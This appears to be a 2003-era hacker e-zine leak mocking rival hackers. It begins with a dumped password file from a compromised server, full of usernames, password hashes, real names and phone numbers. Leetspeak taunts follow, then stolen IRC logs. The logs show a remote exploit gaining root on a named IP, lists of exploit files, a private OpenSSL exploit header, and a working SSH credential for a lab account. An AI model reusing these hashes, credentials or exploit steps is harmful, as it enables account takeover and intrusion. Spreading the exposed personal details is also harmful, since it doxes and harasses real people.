stryder:*Pg3L4cgZ46Dmg:203:100::0:0:Evil Stryder ,,,:/home/stryder:/bin/sh
zac:snLErblZEentg:248:100::0:0:Evil Zac Franken,,,:/home/zac:/bin/sh
daver:rH50FjjPutxvQ:254:100::0:0:Evil Dave,Hell,32,32:/home/daver:/bin/csh
aloke:$1$eaURFYnM$yI1nA0YdKfv9PBBzbN3381:315:315::0:0:Minister of Information:/home/aloke:/bin/csh
matt:$1$OXoVUufN$8VufM8hWgrQSAGc.dLN/10:1003:1003::0:0:matt:/home/matt:/bin/csh
afr:loFmUBjIdTLA2:1004:1004::0:0:aFR:/home/afr:/bin/tcsh
george:*cdUZbnGNFxntY:1005:100::0:0:,,,:/home/george:/bin/csh
heather:dZWlj0q0JGH.Y:1009:100::0:0:heather,,,:/home/heather:/bin/csh
lwpowers:BKYTlfGTgFZsU:1010:100::0:0:Brook Powers,,,:/home/lwpowers:/bin/csh
gessel:$1$S7OOur.H$Vdtn7SbJjNONegb1oY.gl.:1011:100::0:0:,\,,:/home/gessel:/bin/csh
julian:$1$aVAZkTMb$.aCpLZoV4PXWY92s7a7SM0:1015:1015::0:0:Julian Elischer:/home/julian:/bin/csh
warbot:PMpeKV.bg.94w:1016:100::0:0:Wilhemina Arbot,,,:/home/warbot:/bin/csh
nik:*4993EExQcslz2:1017:0::0:0:JoBob Briggs,back 40,nope,yeah right:/home/nik:/bin/csh
harold:cYfwINEWvyJ9A:1019:1019::0:0:Harold Benson,,,:/home/harold:/bin/tcsh
damon:$1$vo1WW7mC$rru3U9qNBgYdqSK3wnSii1:1020:1020::0:0:Damon,,,:/home/damon:/bin/csh
ioscream:33b3ytRixtGWI:1023:1023::0:0:,,,:/home/ioscream:/bin/csh
parmalac:31HUCdyL3/n9c:1024:1024::0:0:,,,:/home/parmalac:/bin/csh
complink:30RncUnzOAuro:1025:1025::0:0:Computer Link Access Account,,,:/home/complink:/bin/csh
expert:M6AmCQ8dheLpY:1026:1026::0:0:,,,:/home/expert:/bin/csh
sarex:VEUZBMxeee6do:1031:1031::0:0:SareX,,,:/home/sarex:/bin/sh
bifrost:9kEey0WTcbUTo:1033:1033::0:0:Evil Bifrost,,,:/home/bifrost:/bin/csh
walkabout:fFDg4c4uPWmug:1034:1034::0:0:,,,:/home/walkabout:/bin/csh
mkb:$1$4xlruvZb$Jbb.Lk6dYZmFK7VFj1Ln50:1036:1036::0:0:Mike Brodhead,Area 51,,510-547-8365:/home/mkb:/bin/tcsh
almus:$1$NdB6m002$tNkmnz8TKT1HukE2WDcqC0:1037:1037::0:0:,,,:/home/almus:/bin/csh
simsong:91OMf13jwRcLE:1039:1039::0:0:Simson L. Garfinkel,,,:/home/simsong:/bin/tcsh
nhd:*DO/goYCqTG97k:1041:1041::0:0:NetWork Hacking Device,,,:/home/nhd:/bin/csh
cimarron:qsj1oXEAQpj.Y:1042:100::0:0:Cim,,,:/home/cimarron:/bin/csh
clay:271Z48qykIt.Y:1044:100::0:0:Clay Bain:/noexist:/bin/csh
bstring:$1$MErxOH4k$AgxgvUlV2ovn2TrAuWVl11:1045:1045::0:0:,,,:/home/bstring:/bin/sh
crack:*:1046:1046::0:0:,,,:/home/crack:/bin/csh
bishopj:18l9gWyVY3GN.:1049:100::0:0:bishop joey,,,:/home/bishopj:/bin/csh
milk:21Ym5Z0c.3ECU:1051:100::0:0:,,,:/home/milk:/bin/csh
dc:UAUGsKxB1brhQ:1053:100::0:0:,,,:/home/dc:/bin/csh
rsi:38PAyBrrWp9lE:1054:100::0:0:,,,:/home/rsi:/bin/sh
karen:aaMxwpoq7.WEg:1055:100::0:0:,,,:/home/karen:/bin/csh
seric:$1$EY2/M2n9$H2KODMGJhzWvo6B1/tUXM.:1056:1056::0:0:Evil Seric,,,:/home/seric:/bin/csh
gruby:*15oNDd9zBeK/6:1057:100::0:0:Evil Gene,,,:/home/gruby:/bin/csh
lagger:33Witv7rDBu0A:1058:100::0:0:Evil Wiesen,,,:/home/lagger:/bin/csh
wk:h2Ln.BKOOHdzw:1059:1059::0:0:William Knowles,,,:/home/wk:/bin/csh
metaxis:82q/Sk8hrPkCU:1060:1060::0:0:Ginny Tonic,I have an office?,(800)777-9388,:/home/metaxis:/bin/tcsh
cb:*BADDPASS*47a0k4u6c4nOk:1061:100::0:0:,,,:/home/cb:/bin/csh
dave:54IoU3DuBh3mM:1062:100::0:0:,,,:/home/dave:/bin/csh
khti:$1$yW6Pje7m$83kTpXwBUT/ZGg9hkFE3Y1:1063:100::0:0:,,,,:/home/khti:/bin/csh
smishey:kh/Ds0sgYe4Go:1064:1064::0:0:,,,:/home/smishey:/bin/csh
chs:INprg2hN9oD4Y:1065:1065::0:0:Christian Hedegaard-Schou I,,,:/home/chs:/bin/sh
v1ru5:$1$u3HZgPYI$dfyYtZV6YsAKP30.RYd8i1:1066:1066::0:0:v1ru5,,,:/home/v1ru5:/bin/csh
tpete:64/2.I/8snal.:1068:1068::0:0:Tracy Peterson,www.ninthhouse.com,,:/home/tpete:/bin/csh
cal:$1$2gHc8mUr$FNxZU6f0s5F0tx7Y1oomf0:1069:1069::0:0:Cal:/home/cal:/bin/csh
wireman:MXgnyrWJ3zWSk:1070:1070::0:0:,,,:/home/wireman:/bin/csh
shatter:$1$HjznUxQw$rGklAs6vJ/3VHGGJL46Bk0:1071:1071::0:0:,,,:/home/shatter:/bin/csh
rc5des:*:1072:1072::0:0:RC5 challenge uid,,,:/home/rc5des:/bin/csh
punkis:nRaqbZqhjvPx6:1074:1074::0:0:punkis ,,,:/home/punkis:/bin/sh
comega:49J3tfn.z0zPs:1075:1075::0:0:Cancer Omega,Southern California,,:/home/comega:/bin/sh
gh0st:DSERHoVkG3Rq.:1076:1076::0:0:,,,:/home/gh0st:/bin/csh
mrmojo:$1$FKehTNKV$AwFXg80mj6yD1rKBSMOG/0:1078:1078::0:0:Mr. Mojo,,,:/home/mrmojo:/bin/csh
bailey:t7BNiuBSu35uQ:1080:1080::0:0:Evil bailey,,,:/home/bailey:/bin/csh
mentat:25yQFKq9R4BMY:1081:1081::0:0:,,,:/home/mentat:/bin/csh
spork:kYT8kaRCxWCP6:1082:100::0:0:spork :/home/spork:/usr/local/bin/bash
eris:92mjA5hyoxZVk:1083:100::0:0:Lenore D'Mort,,,:/home/eris:/bin/csh
jkuroda:$1$12ErrPaA$VB0Ro4hvlv8To1GMzpB7V.:1084:100::0:0:jk,,,:/home/jkuroda:/bin/csh
weldon:9PxczkV42.kJw:1085:100::0:0:Weldon Dodd,,,:/home/weldon:/bin/csh
justabill:$1$J4UXQ1kH$EjUyYrNsMcaEFSJYVpPyK1:1086:100::0:0:,,,:/home/justabill:/bin/csh
fwf:$1$FHoV3vZt$izkVSdJfscWtUMvm8ifDM1:1087:100::0:0:,,,:/home/fwf:/bin/csh
sharon:45LMkfo83RnYE:1088:100::0:0:,,,:/home/sharon:/bin/csh
jlc:78klFR8P9HG8E:1089:100::0:0:,,,:/home/jlc:/bin/csh
arrawn:75snoytaqtsnY:1090:100::0:0:,,,:/home/arrawn:/bin/csh
malikia:bC2cXH3o6ertI:1091:100::0:0:,,,:/home/malikia:/bin/csh
angel:49eYDHgBHaTVg:1092:100::0:0:,,,:/home/angel:/bin/csh
xs:PgnpiTcRaA9bU:1093:1093::0:0:xs,,,:/home/xs:/bin/sh
jraff:49eYDHgBHaTVg:1094:100::0:0:,,,:/home/jraff:/bin/csh
jdog:21D.6K92cFFLU:1095:1095::0:0:,,,:/home/jdog:/bin/csh
oldwolf:$1$d.a5UDct$adTWC4Syy36xTho0NLnui1:1096:100::0:0:Gerald Tarrant,666 Hell Street,666-6666,go away:/home/oldwolf:/bin/csh
grepcat:$1$7C95rldY$aL4CpEpSgFGfyBohrIyqJ1:1097:1097::0:0:Grep Catt,,,:/home/grepcat:/bin/csh
jeru:$1$TqCo35g5$W8eWSfVrfNesM/jw2Qm0D.:1098:100::0:0:,,,:/home/jeru:/bin/sh
pipe:48Jh1IBOzSR5U:1099:100::0:0:,,,:/home/pipe:/bin/sh
bitrush:4dvmnn.huaAPs:1100:100::0:0::/home/bitrush:/usr/local/bin/bash
pulley:dp6jjJ/I1D5zU:1101:1101::0:0:Eric S Pulley,,,707-579-4157 :/home/pulley:/bin/tcsh
cfrankli:65ldy/VbHMzJ6:1103:1102::0:0:Chris Franklin,,,://home/cfrankli:/bin/csh
rfrankli:41N4z0rR9MGt6:1104:1104::0:0:Roger Franklin,,510 758 2213,510 758 2213:/home/rfrankli:/bin/csh
phon-e:35WInlWg82hcc:1105:1105::0:0:Phon-E,,,:/home/phon-e:/bin/csh
wyatt:$1$AC2b3P6w$AaWk4Y2rU9psBs4U8BnJj0:1110:1110::0:0:Evil Wyatt ,-,-,-:/home/wyatt:/bin/csh
steve:8YLhzPL/EUzek:1111:1110::0:0:Steven Kenshalo,209-578-4990,,:/home/steve:/bin/csh
john:yXtkljoGZywOE:1112:1112::0:0:John Kenshalo,,,:/home/john:/bin/csh
judy:28BCNLXm6cES.:1113:1113::0:0:Judy Kenshalo,,,:/home/judy:/bin/csh
darkange:qm6G/cq7kXsus:1114:1114::0:0:DarkAngel,,,:/home/darkangel:/bin/tcsh
attila:DnBTuFbhRaLiE.O6:1115:1115::0:0:Doug C.,,,:/home/attila:/bin/csh
hpeyerl:$1$geXwlldF$jl3Gj4UiSMsoFLFLGaQht1:1118:1118::0:0:Herb Peyerl:/home/hpeyerl:/usr/local/bin/bash
heathen:46zUKRjT3J/YE:1121:1121::0:0:,,,:/home/heathen:/bin/csh
cassiel:$1$fVb6Fuz7$vWisLFp6CmPbF6XCf/7tf/:1230:1230::0:0:,,,:/home/cassiel:/bin/csh
cardinal:$1$XbOY2TXr$JlRsCmZRTIc1PFnrJZnLM0:1048:100::0:0:,,,:/home/cardinal:/bin/csh
sarah:$1$GqbMwgkl$DaUZHz61Tk8A7DwBc9fjV0:1250:1250::0:0:??,,,:/home/sarah:/bin/csh
seventek:$1$fMdpbBsq$EY.BSS/krN8qf3JMAIxSQ/:1280:1280::0:0:Joeseph Seventek ,,,:/home/seventek:/bin/tcsh
cyber:rJnxNCCFbxPCQ:2001:2001:staff:0:0:Evil Erik:/home/cyber:/bin/tcsh
delux:8kwd1aLJCHs2M:2002:2002::0:0:Evil D. Meriwether,,,:/home/delux:/bin/csh
muir:zkSihoVl8FhOI:2043:2043::0:0:David Muir Sharnoff,,,:/home/muir:/bin/csh
jon:hGufGhBASbpTA:13402:100::0:0:Jon Blow,.,,:/home/jon:/bin/csh
dover:$1$5aio3Gd5$yMu13fhRICWVkch8UWxBK.:30025:100::0:0:dover ,,,:/home/dover:/bin/csh
fas:**40ehucFyFYo8s:32700:84:ftponly:0:0:www.fascinator.net ftp Account:/html/docs/www.fascinator.net/:/sbin/nologin
bagg:IW7YeVtKCTcOw:32701:84:ftponly:0:0:BAGG ftp Account:/html/docs/www.bondage-a-go-go.com/:/sbin/ftponly
berz:**Y9U7OTC9wSSy6:1001:1001::0:0:berz:/home/berz:/bin/csh
default:AxYtQlu/9CwqU:1002:1002::0:0:default:/home/default:/bin/csh
msmith:*:3003:3003::0:0:User &:/home/msmith:/bin/csh
bill:XpysrWb6z9DcE:1006:999::0:0:bill scannell:/home/bill:/bin/csh
ftp:**:14:5::0:0:Anonymous FTP Admin:/html/OLD/ftp/ftp.dis.org/:/nonexistent
enrique:$1$mOjm834d$E8gmd4NP/5//U1qxZIpnP/:1007:1007::0:0:enrique:/home/enrique:/bin/sh
gonzo:$1$iegkZZgG$QUC7.teiWvECEt7XRCoEM.:1014:1014::0:0:gonzo:/home/gonzo:/bin/csh
testuser:**t0EqkM4evoxoM:1028:1028::0:0:testuser:/home/testuser:/bin/csh
xam:Mu9ulQPpyBTKo:1029:1029::0:0:xam:/home/xam:/bin/csh
rds:TIBme4UxWnkcg:1030:1030::0:0:rds:/home/rds:/bin/csh
tom:$1$tZnm9.Tg$Gs25Fgu5vEErUlOVaAOsz0:1032:1032::0:0:tom:/home/tom:/bin/csh
eh:$1$2.OdAQYs$WVofOR3NqIUdY6R.bqNAn/:1040:1040::0:0:eh:/home/eh:/bin/csh
till:$1$9IKa/IOj$vXXp.jTfdsLrjgytheq.x0:1047:998::0:0:till:/home/till:/bin/csh
splice:$1$bJvgdCU0$GHDX4BkW6HfofCRF9J6aM0:1067:997::0:0:splice:/home/splice:/bin/tcsh
xenu:$1$xDTWp6y4$idPRu2tMHbKgA6u11VvDS.:1073:996::0:0:xenu:/home/xenu:/bin/csh
andrew:**RBzXSm72KoYhk:1079:1079::0:0:andrew:/home/andrew:/bin/csh
noise:$1$0YHvkqNW$wjVbvJEGIQXRUxX3JFzvJ.:1102:995::0:0:noise:/home/noise:/bin/sh
bronc:$1$lrWSK2BH$mujKWzTg.LRNYwxfTFlQs1:10000:10000::0:0:bronc:/home/bronc:/bin/sh
pablos:**$1$pCb9IrUe$SCjtCRER5PO7rMKTX/ha91:1106:1106::0:0:pablos:/home/pablos:/bin/csh
wintamute:FRUBRptgXpGpg:1107:1107::0:0:wintamute:/home/wintamute:/bin/sh
humperdink:$1$NZRsskK5$mi4XK5pB1.VECx2taJ2iX1:1108:1108::0:0:humperdink:/home/humperdink:/bin/csh
grrlbot:$1$sSY2Ibyp$EC0FBtBH9gVI6S564nWqT.:1109:1109::0:0:grrlbot:/home/grrlbot:/bin/csh
thalakan:$1$DKx5R.ea$MsJl4/GNgi5w51eqTty7d0:1116:1116::0:0:Jason Spence,,510 656 5690,650 520 5090:/home/thalakan:/usr/local/bin/bash
static:$1$E9pk1gAQ$p66IPgElqCjnrEtMaXOSY1:1117:1117::0:0:static:/home/static:/bin/csh
whysean:$1$oxqLK9HE$7CCyOmVvQX2VV.JhauQwT/:1119:1119::0:0:whysean:/home/whysean:/bin/csh
czarina:$1$jXnU3Wz7$rnmJWvzzVGwUJFICEo8Xm1:1120:1120::0:0:czarina:/home/czarina:/bin/csh
change:$1$SOzCTiLf$EFibZmlj0xhJYeZHKGTkA0:1122:1122::0:0:change:/home/change:/bin/csh
palevsky:$1$22s2swRA$9zQqqXIl1VOMMPKH7gYj/.:1000:1000::0:0:palevsky:/home/palevsky:/bin/csh
surlyone:kEhA0fuZjdi5Y:1012:1012::0:0:surlyone:/home/surlyone:/bin/csh
roamer:$1$7O6h/3S1$Ysr2UKLLcwPQv6EBpryDx1:1013:1013::0:0:roamer:/home/roamer:/bin/csh
arlynne:$1$NfpLjquv$w9RFTxrLsHoSnb1qCgeXr/:1018:1018::0:0:arlynne c:/home/arlynne:/bin/csh
jrh:Nh.QSqonM5tUs:1021:1021::0:0:Josh Howard:/home/jrh:/bin/tcsh
daiv:9UNz54RjRxZQk:1035:1035::0:0:daiv:/home/daiv:/bin/csh
mikes:$1$x4cVbaR.$TYwn3wx4te8.6Nj4bJMvo.:1043:1043::0:0:Mike Seelau:/home/mikes:/bin/csh
wenna:g4VW93DqT6BbY:1077:1077::0:0:wenna:/home/wenna:/bin/csh
error:9Bhrqz4h12RXM:1123:1123::0:0:J.S.:/home/error:/bin/csh
db_cooper:$1$ELEim/so$ZD5VQ/OyGOUpgkSMcOw2S1:1124:1124::0:0:trent:/home/db_cooper:/bin/csh
jeedi:$1$ZoHXRhyG$cOlo8NJ/9VERWs/v/FvWR.:1125:1125::0:0:jeedi:/home/jeedi:/usr/local/bin/bash
cat:z62RrjyYvOEnc:1126:1126::0:0:cat:/home/cat:/bin/csh
auto:VURA1HGnDxTec:1127:1127::0:0:auto:/home/auto:/bin/csh
olivas:$1$hwmR3yk8$M9sPohKEv3mcElvA4ssXR.:1128:1128::0:0:olivas:/home/olivas:/bin/csh
ultraviolate:Y0445fYXblW7c:1129:1129::0:0:ultraviolate:/home/ultraviolate:/bin/csh
papersplease:YktVy0a4bF5MU:6000:6000::0:0:papersplease:/html/docs/www.papersplease.org:/sbin/ftponly
mischa:M54X73ZnJi67k:1130:1130::0:0:mischa scannell:/home/mischa:/bin/csh
william:p01g5A0jARD5s:1131:1131::0:0:william scannell:/home/william:/bin/csh
midnight:V9XSjzD0hAF4M:1132:1132::0:0:talthing:/home/midnight:/bin/csh
evilboi:**$1$B11SBaHy$16TYczGKzv3/yW/zUjGn7/:1133:1133::0:0:evilboi:/home/evilboi:/usr/local/bin/bash
glitch:JBnFBd06o16BA:1134:1134::0:0:marsha:/home/glitch:/bin/csh
darkmas:YczG4FsJCUAPI:1135:1135::0:0:bill:/home/darkmas:/bin/csh
[root@kizmiaz] #
^^^ Cr4ck d3z & c0m3 j01n uz. Th3 f1l3z 0n th1z b0x r0ckz ^^^
th4nkz t0 "the next teso" gr0up (n3tr1c) f0r l3tt1ng uz m0dd1fy th31r w0nd3rful
w4r3z, wh1ch w3 c0uldnt h4v3 0wn3d d1s.0rg w1th0ut! 4ls0 th4nkz t0 dvdman f0r
4ll0w1ng b4ngbr0z b3 a t3stb3d (m0r3 0n th1z l4t3r).
18.txt -~-~-~ h3llm4n c4nt 4dm1n
3y3 w4z th1nk1ng.. w3 sh0uld juzt turn th1z z1n3 1nt0 a r3p0s1t0ry 0f ch4tl0gz.
g00d 1d34 huh? 3y3 g0t k1qb4nn3d fr0m #darknet s0 fuq th3m. h3r3 4r3 s0m3 fr0m
th3 s3lf pr0cl41m3d f0und3r 0f teso..
[MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au talk us up
[MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au lol
[SEND_MSG] [09:26pm] - #webdesign hah yeah that was a fun night
[SEND_MSG] [09:27pm] - #webdesign memba the night tho we had 4 chicks and us 2
at my house.. in the spa.. then fucking in like every room in the
house.. that was also a kick ass night.
[SEND_MSG] [09:27pm] - kas i did that
[SEND_MSG] [09:27pm] - kas but wif some1 else
[SEND_MSG] [09:27pm] - #webdesign i have nothing to prove .. no reason to lie
[SEND_MSG] [09:27pm] - #webdesign i just talk facts
[SEND_MSG] [09:28pm] - #webdesign oh lord....
R3M3MB3R TH1S "i just talk facts"
[SEND_MSG] [12:13am] - #webdesign ever herad of a crew called teso ?
[SEND_MSG] [12:15am] - #webdesign www.team-teso.net we release useful tolls
W3? BUHAHAHAHA. L1K3 Y0U C4N FUQN C0D3.
[MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au <cfquery
name="qResults" datasource="atessa13dbase" dbname="MEMBERS.DBF"
username="atessa13">
[MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au still not working
[SEND_MSG] [11:31pm] - kerr hrmm add password="skyline1"
[SEND_MSG] [11:39pm] - kerr hrmm
[SEND_MSG] [11:39pm] - kerr leme try something
L3T M3 TRY SN1FF1NG Y0UR P4ZZW0RDZ. H4R H4R H4R
[SEND_MSG] [12:02pm] - #web-design hrmm found a bug in the linux kernel
[SEND_MSG] [12:02pm] - #web-design buffer overflow
[SEND_MSG] [12:02pm] - #web-design looks like if you get yourself in enough
groups
[SEND_MSG] [12:02pm] - #web-design you can overflow the task_state() by doing a
cat /proc/$$/status
[SEND_MSG] [12:02pm] - #web-design for (g = 0; g < p->ngroups; g++)
[SEND_MSG] [12:02pm] - #web-design buffer += sprintf(buffer,
"%d ", p->groups[g]);
[SEND_MSG] [12:02pm] - #web-design I cant find the size of the buffer however
[SEND_MSG] [12:02pm] - #web-design but it looks like it passes thru alot of
functions with no bounds checking.
MUZT B3 A BUG.. R U SUR3 Y0U 4RNT L34K1NG S1LV10'Z R3S34RCH??
[SEND_MSG] [11:59pm] - jeeves but it takes time to build up the experience
[SEND_MSG] [11:59pm] - jeeves to learn the tricks
[SEND_MSG] [11:59pm] - jeeves to make the money
[SEND_MSG] [11:59pm] - jeeves cos if u go spamming people
[SEND_MSG] [11:59pm] - jeeves if u dont know what ur doing
[SEND_MSG] [11:59pm] - jeeves u will be shut down
[TimeStamp Tue Mar 18 00:00:00 2003]
[TimeStamp Tue Mar 18 00:00:00 2003]
[SEND_MSG] [12:00am] - jeeves within a day
[SEND_MSG] [12:00am] - jeeves but if u do know whats going on
[SEND_MSG] [12:00am] - jeeves usd$5k a week easy
[SEND_MSG] [12:05am] - jeeves i can vouch for that sorta money too
C4RL SP4MZ.
[SEND_MSG] [09:38pm] - #kas all u need is 1 tcp port
[SEND_MSG] [09:38pm] - #kas all i need
[SEND_MSG] [09:38pm] - #kas nearly done
[SEND_MSG] [09:38pm] - #kas sec
[SEND_MSG] [09:39pm] - #kas root@main:~/.s/enc# ./7350paom
[SEND_MSG] [09:39pm] - #kas Tcpd Remote exploit for Linux 2.2.*, 2.4.* 09/10/02
[SEND_MSG] [09:39pm] - #kas by jduck, thanks to xor, zip, scut and ronin.
[SEND_MSG] [09:39pm] - #kas Enter Password:
[SEND_MSG] [09:39pm] - #kas **************
[SEND_MSG] [09:39pm] - #kas Using Offset: 0x08fc3e
[SEND_MSG] [09:39pm] - #kas EIP: 0x08fdd0c
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0a ... failed
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0b ... failed
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0c ... verified
[SEND_MSG] [09:39pm] - #kas ** Lets see what we can bind(); **
[SEND_MSG] [09:39pm] - #kas Exploiting Host: 203.173.160.36....(OK)
[SEND_MSG] [09:39pm] - #kas Binding shell on port 7350
[SEND_MSG] [09:39pm] - #kas > id
[SEND_MSG] [09:39pm] - #kas uid=0(root) gid=0(root) groups=0(root),1(bin)
[SEND_MSG] [09:39pm] - #kas bingo!
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au fuk
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au GIBME!
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au LOL
[SEND_MSG] [09:40pm] - #kas 1 sec.. checking out stuff
[SEND_MSG] [09:43pm] - #kas hrmm he ran iptables before i could run it on that port
[SEND_MSG] [09:43pm] - #kas take down that firewall again
[SEND_MSG] [09:44pm] - #kas h$ ls
[SEND_MSG] [09:44pm] - #kas 7350reass.tar.gz holygrail.c napalm openssl-fuck.c rsx.c t vmware.zip
[SEND_MSG] [09:44pm] - #kas 840.bind9.c hpkit0.2.tar.gz napalm2.c openssl-too-open-Hool.c snifft.c tank2.c
[SEND_MSG] [09:44pm] - #kas bindtty.c hpux-ftp.c nlock.c p24.bin sqlfuck.tgz telnetd.c
[SEND_MSG] [09:44pm] - #kas frassl.c nainject.c openssl-fuck-new.c rdevx.c sxp.bin tsao.tar
[SEND_MSG] [09:44pm] - #kas $ ./7350reass
[SEND_MSG] [09:44pm] - #kas 7350reass - OpenBSD/FreeBSD/NetBSD remote kernel exploit
[SEND_MSG] [09:44pm] - #kas fragment reassembly numeric overflow + logic fuckup
[SEND_MSG] [09:44pm] - #kas -s & -l (21/04)
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas inferior exploits for this bug rely on 3 values.. we
[SEND_MSG] [09:44pm] - #kas only need the ip_reass delta, but still, patience
[SEND_MSG] [09:44pm] - #kas is required to find this.. this shouldn't be a
[SEND_MSG] [09:44pm] - #kas problem.. you don't need root to run this, as
[SEND_MSG] [09:44pm] - #kas everything can be crafted via setsockopt..
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas mhhh, should get you in.. < 5 minutes..
[SEND_MSG] [09:44pm] - #kas no guarantees though..
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas OpenBSD developers are weenies ;)
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas TESO: 2^32-1 SecurityFocus: 2>>2
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas password:
[SEND_MSG] [09:44pm] - #kas $ head -30 openssl-fuck-new.c
[SEND_MSG] [09:44pm] - #kas /*
[SEND_MSG] [09:44pm] - #kas * openssl-too-open.c - OpenSSL remote apache exploit
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * by Solar Eclipse <solareclipse@phreedom.org>
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * Compile with: gcc -o openssl-too-open openssl-too-open.c -lcrypto
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * Private 0dd code. -keep it so divineint :)
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * this kode has one extra target for redhat 7.2 / apache 1.3.22-6
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas */
[SEND_MSG] [09:44pm] - #kas ya
[SEND_MSG] [09:44pm] - #kas ok
[SEND_MSG] [09:44pm] - #kas how about
[SEND_MSG] [09:44pm] - #kas i show u something
[SEND_MSG] [09:45pm] - #kas 1 sec
[SEND_MSG] [09:45pm] - #kas <-- actually researches his own code
[SEND_MSG] [09:46pm] - tom kas.net.au/OpenSSH_3.5p1.txt
[SEND_MSG] [09:46pm] - tom want the exploit for that ?
[SEND_MSG] [09:46pm] - drewgon kas.net.au/OpenSSH_3.5p1.txt
[SEND_MSG] [09:46pm] - drewgon want the exploit for that ?
[SEND_MSG] [09:46pm] - drewgon hehe
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au yep
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au mm
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au i want openssl root.
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au lol
[NOTICES ] [09:46pm] - tom no thanks :P
[SEND_MSG] [09:47pm] - tom take a look down the bottom
[NOTICES ] [09:48pm] - tom so?
[SEND_MSG] [09:48pm] - tom not just a script kiddie from packet storm
[NOTICES ] [09:48pm] - tom err
[NOTICES ] [09:49pm] - tom i dont see the relevance mate :)
[NOTICES ] [09:49pm] - tom im not assuming youre a script kiddie
GR34T3ZT L0G 3V3R. D0NT Y0U D4R3 L34K THE REM0T3 *BSD K3RN3L 0D4Y!!!!
TH1Z MUZT B3 WHY Y0U H4V3 T0 C4RD 4LL Y0UR SH3LL 4CC0UNTZ 0N FBSD B0X3Z & RUN IOSMASH, R1GHT??
[SEND_MSG] [05:28pm] - darkacid` <Kwahraw> <darkacid> i fill sorry for people like cam
[SEND_MSG] [05:28pm] - darkacid` <Kwahraw> so, cam is our leak?
[SEND_MSG] [05:28pm] - darkacid` <Zardoz> is he?
[MSGS ] [05:28pm] - darkacid` marijuana@1.800.p1mpdaddy.com LOL
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com should i say know cam is not our leak?
[SEND_MSG] [05:29pm] - darkacid` dont say anything
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com ok
[SEND_MSG] [05:29pm] - darkacid` they know something is leaking though
[SEND_MSG] [05:29pm] - darkacid` dont proveke the subject
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com yeh
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com kk
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com they think icer is sniffing em
[MSGS ] [05:30pm] - darkacid` marijuana@1.800.p1mpdaddy.com are those root's ssh ?
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com petermc:wyei$7@petermc.lbl.gov
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com works
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;PP
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com lol
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com god man
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com inever know you knew shit like this
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;P
[SEND_MSG] [05:32pm] - darkacid` as i said
[SEND_MSG] [05:32pm] - darkacid` i know more than i lead on to know
[SEND_MSG] [05:32pm] - darkacid` dont mess with me
BULLSH1T. H0NO W1LL FUQN H4Q Y0U 4G41N Y0U SP4MM1NG B1TCH! Y0U H4V3 N0 FUQN S3CUR1TY. Y0U 4R3 FUQN SCUM.
G0 C4RD S0M3M0R3 SH3LLZ S0 Y0U C4N H4CK Y0U FUQN N0 T4L3NT P13C3 0F D0GSH1T.
[SEND_MSG] [11:38am] - harq .
[NOTICES ] [11:38am] - harq DCC Send fahrenheit.tgz (81.86.236.41)
[MSGS ] [11:38am] - harq harq@dope.illhiphop.org <3 drag'n'drop
HARQ <3 SP4M. HARQ <3 T0 G3T 0WN3D T00?
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 dood
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256
pd@race4:/eggdrop/scripts$ ssh eu.kas.net.au -lthebug
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 thats in my history
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 on my shell
H0NO FUQZ UP!!!
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 81.91.65.208
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 is the ip
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 they used to connect
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 .fr ip
[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 fuck me
